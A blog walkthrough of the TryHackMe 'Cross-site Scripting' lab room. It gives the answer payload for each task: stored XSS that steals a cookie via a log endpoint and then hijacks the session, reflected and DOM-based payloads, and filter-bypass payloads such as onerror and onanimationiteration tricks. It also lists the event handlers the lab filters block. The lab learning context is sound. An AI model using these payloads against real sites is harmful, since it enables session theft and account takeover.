The Dutch Hacker
Cross-site Scripting writeup

Cross-site Scripting on Tryhackme

This is the write up for the room Cross-site Scripting on Tryhackme and it is part of the Web Fundamentals Path

Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment.

Tasks Cross-site Scripting

Task 1

Read all that is in this task and press complete

Task 2

Start the machine attached to this task. The navigate to http://MACHINE_IP

Task 3

Read all that is in the task

3.1 Add a comment and see if you can insert some of your own HTML.

Basicly any HTML tag will to

type in the following

 <!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
</head>
<body>

<h1>This is a Heading</h1>
<p>This is a paragraph.</p>

</body>
</html> 
XXS writeup on tryhackme

3.2 Create an alert popup box appear on the page with your document cookies.

document.cookie is the script command to get the current cookie

Type in the following

<script>alert(document.cookie)</script>
XXS writeup on tryhackme

3.3 Change “XSS Playground” to “I am a hacker” by adding comments and using Javascript.

This can be done with HTML tag. Type in the following

<script>document.querySelector('#thm-title').textContent = 'I am a Hacker'</script>

The answer of this question will reveal itself in on the page. Not in a popup

3.4 Take over Jack’s account by stealing his cookie, what was his cookie value?

As the hint is saying they made things easy to write it to the log

Type in the following

<script>document.location='/log/'+document.cookie</script> 

Now navigate to http://MACHINE_IP/logs

See the cookie

Now copy the cookie ( after connect.sid). This is also the answer of the question

3.5 Post a comment as Jack.

Now we still have to cookie. press F12 when on the page and select storage

Cross-site Scripting writeup on tryhackme

Change the value of this cookie to the one in the Log

Reload the page and port a comment

Task 4

4.1 Craft a reflected XSS payload that will cause a popup saying “Hello”

Type in the following also notice the URL

<script>alert("Hello")</script>

4.2 Craft a reflected XSS payload that will cause a popup with your machines IP address.

Type in the following

<script>alert(window.location.hostname)</script>

Task 5

5.1 Look at the deployed machines DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.

Type in the folowing

test" onmouseover="alert('Hover over the image and inspect the image element')"

Now move the mouse over the image not found tekst. A popup will reveal. So we now know it is working

Type in the following command

test" onmouseover="alert(document.cookie)"
Cross-site Scripting writeup on tryhackme

The next popup will have the answer

5.2 Create an onhover event on an image tag, that change the background color of the website to red.

Type in the following code

test" onmouseover="document.body.style.backgroundColor = 'red';

Task 6

Read all that is in the task navigate to the IP and port Scanning with XSS tab and read the explanation of the code. Press complete when ready

Task 7

You can copy and paste the code in the key logger and put it in the stored XXS

Task 8

8.1 Bypass the filter that removes any script tags.

<img src=x onerror=alert('Hello');>

8.2 The word alert is filtered, bypass it.

0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"

8.3 The word hello is filtered, bypass it.

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>

8.4 Filtered in challenge 4 is as follows:

  • word “Hello”
  • script
  • onerror
  • onsubmit
  • onload
  • onmouseover
  • onfocus
  • onmouseout
  • onkeypress
  • onchange
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>

Task 9

Read all that is in the task and press complete

Most Popular Post

Sign Up

Signup today for free and be the first to get notified on new updates.
* indicates required

Follow Me

Most Popular Post

Contact Us